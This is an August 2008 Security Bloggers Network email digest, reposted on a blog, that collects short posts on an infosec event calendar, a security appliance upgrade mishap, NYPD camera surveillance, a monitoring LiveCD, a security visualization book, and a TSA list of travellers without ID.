You Decide! [Vitalsecurity.org - A Revolution is the Solution] Posted: 14 Aug 2008 05:28 AM CDT Is this: 1) A brilliant defence of Mylol.net 2) A scathing attack on Mylol.net 3) Something that was, in fact, posted by The Batman of Zur-En-Arrh while out of his mind on PCP. Because I honestly have no idea. |
New NoVA Infosec Calendar Feature & ShareThis Capability [NovaInfosecPortal.com] Posted: 14 Aug 2008 02:06 AM CDT In an effort to help everyone plan a little bit more in advance, we’ve added a calendar for events that take place in or around NoVA. Currently, we’re just beta testing it to see how it works out. Please feel free to let us know what you think in the comments for this post. Also, use our Contact Us page to submit events that you would like added to the calendar. I’m hoping that in the future we can set something up so anyone can add events (with a little moderation of course ). Any suggestions would be appreciated. You may have also noticed that we added a ShareThis capability in our posts and pages. Hopefully, this feature will make it easier for you to pass along any nuggets to other infosec professionals. Enjoy! |
Posted: 14 Aug 2008 12:06 AM CDT Everyone (read: me) is looking for an unfair advantage. the cloak of invisibility that allows you to see and not be seen or makes your product sell like there's nothing else. If you were watching the Summer Olympics swimming contest, you could have understand how technology can be translated into unfair advantage, in its positive meaning. The number of new world records is sky rocketing. In fact, it looks like we have a new world record for the number of world records.... Taste some of the debate at the Sport Scientists , and here the other experts are claiming that it's harmful. The |
Twitter Updates for 2008-08-13 [.:Computer Defense:.] Posted: 13 Aug 2008 10:59 PM CDT
Powered by Twitter Tools. |
I Should Have Seen This Coming [BumpInTheWire.com] Posted: 13 Aug 2008 10:56 PM CDT It all started about 11:15 today. As I got out of my chair to leave to go pick up a sick kid I noticed El Sidekick had some road rash on his chin. His reluctance to explain what happened kicked my imagination into overdrive to a point that I don’t want to know what happened because it will just be disappointing compared to what my brain came up with. I worked from home this afternoon preparing to support El Sidekick upgrade our two LANsight Security Management Appliances to the latest 5.1 code. I downloaded and read the documentation (a rarity for me) to get myself prepared. The upgrade was supposed to happen at 6:30 PM tonight. “Supposed to” being the key words there. Late this afternoon I get the configs backed up just incase things went south during the upgrade. We’re all set. 6:30 comes and goes. 6:45 comes and goes. 7:00 comes and goes. At 7:07 I email El Sidekick a message that said “sure are using the word ‘about’ loosely” in reference to an “about 6:30″ start time. Finally at 7:19 I get a reply. Being nearly an hour behind now should have been another clue as to how the night would end. We had to make some networking changes in order to accomodate the new hardware, being installed tomorrow, so once that was complete we were ready for the upgrade. First attempt revealed a web server issue that we had to work through. Once we got that behind us we were cleared for take off. Unfortunately the plane never even left the gate. When initiating the upgrade we got an error so vague that only one thing came to mind. We did the standard operating procedure to try to get around it. Rebooted the server, downloaded the upgrade image again, etc, etc all with no luck. Why should I change my name? He’s the one that sucks. - Michael Bolton in Office Space This posting includes an audio/video/photo media file: Download Now |
Outrage At NY Police Tracking Plan [Liquidmatrix Security Digest] Posted: 13 Aug 2008 08:21 PM CDT The NYPD has set off the community with a proposed plan to track vehicles with the use of a mesh of cameras. The entire idea is to drop a surveillance web across Manhattan. All of this under the guise of avoiding another terrorist attack. The ultimate “go to” excuse to strip away rights and spend money on blinking lights. From The Guardian:
Folks in NYC might be pissed at this possibility. I would offer that this has been shown to be relatively ineffective in London where the “ring of steel” does little more than spot the occasional pan handler. The New York “sentinel” video system will be set up to record license plates of all vehicles at every point into Manhattan. The data would be “kept on computer for a month”. Uh huh. If you are willing to swallow that nonsense I have some land in Florida I would be willing to sell ya. For the full article read on. |
raWPacket HeX - Network Security Monitoring & Analysis LiveCD [Darknet - The Darkside] Posted: 13 Aug 2008 04:01 PM CDT HeX is a project aimed at the NSM (Network Security Monitoring) community for use by network security analysts. The developers believe that simplicity and analysis work flow logic must be enhanced and emphasized through-out the process of designing this liveCD. Not only have they carefully chosen all the necessary applications and tools to be... Read the full post at darknet.org.uk |
Applied Security Visualization Book is Available! [Raffy - Security Data Visualization] Posted: 13 Aug 2008 03:38 PM CDT The Applied Security Visualization book is DONE and available in your favorite store! Last Tuesday when I arrived at BlackHat, I walked straight up to the book store. And there it was! I held it in my hands for the first time. I have to say, it was a really emotional moment. Seeing the product of 1.5 years of work was just amazing. I am really happy with how the book turned out. The color insert in the middle is a real eye-catcher for people flipping through the book and it greatly helps making some of the graphs better interpretable. I had a few copies to give away during BlackHat and DefCon. I am glad I was able to give copies to some people that have contributed by inspiring me, challenging me, or even giving me very specific use-cases that I collected in the book. Thanks everyone again! I really appreciate all your help. People keep asking me what the next project is now that the book is out. Well, I am still busy. secviz.org is one of my projects. I am trying to get more people involved in the discussions and get more people to contribute graphs. Another project I am starting is to build out a training around the book, which I want to teach at security conferences. I have a few leads already for that. Drop me a note if you would be interested in taking such a training. Maybe I will also get some time to work on AfterGlow some more. I have a lot of ideas on that end… During DefCon, I recorded a PodCast with Martin McKeay where I talk a little bit about the book. This posting includes an audio/video/photo media file: Download Now |
USPTO To Revisit Dell’s ‘Cloud Computing’ Claim [Liquidmatrix Security Digest] Posted: 13 Aug 2008 02:29 PM CDT Catching up on my reading. I missed this article last week as I was focused on BH/Defcon. There’s some good news from the US Patent office for a change. From IT World:
Read on for the full article. |
TSA Puts Fliers Without ID On A List [Liquidmatrix Security Digest] Posted: 13 Aug 2008 02:24 PM CDT So, if it wasn’t bad enough that there are 1 million plus folks on the “do not fly” list it appears that there is another list in the USA. The TSA (my buds) have managed to take the names of people who fly within the US without ID, which is legal, and compile a list. So, where have these names ended up? Funny you ask. They’ve been added to a database of folks who have violated security laws or have been questioned due to their behaviour. WTF? From USA Today:
OK, so let me get this straight this info is to “helps track potential terrorists”? Did anyone at the TSA miss the fact that it is perfectly legal for US citizens to travel without ID within the States? And the data will be stored in some cases for up to 15 years. Don’t forget your wallet. |
You are subscribed to email updates from Security Bloggers Network To stop receiving these emails, you may unsubscribe now. | Email Delivery powered by FeedBurner |
Inbox too full? Subscribe to the feed version of Security Bloggers Network in a feed reader. | |
If you prefer to unsubscribe via postal mail, write to: Security Bloggers Network, c/o FeedBurner, 20 W Kinzie, 9th Floor, Chicago IL USA 60610 |
No comments:
Post a Comment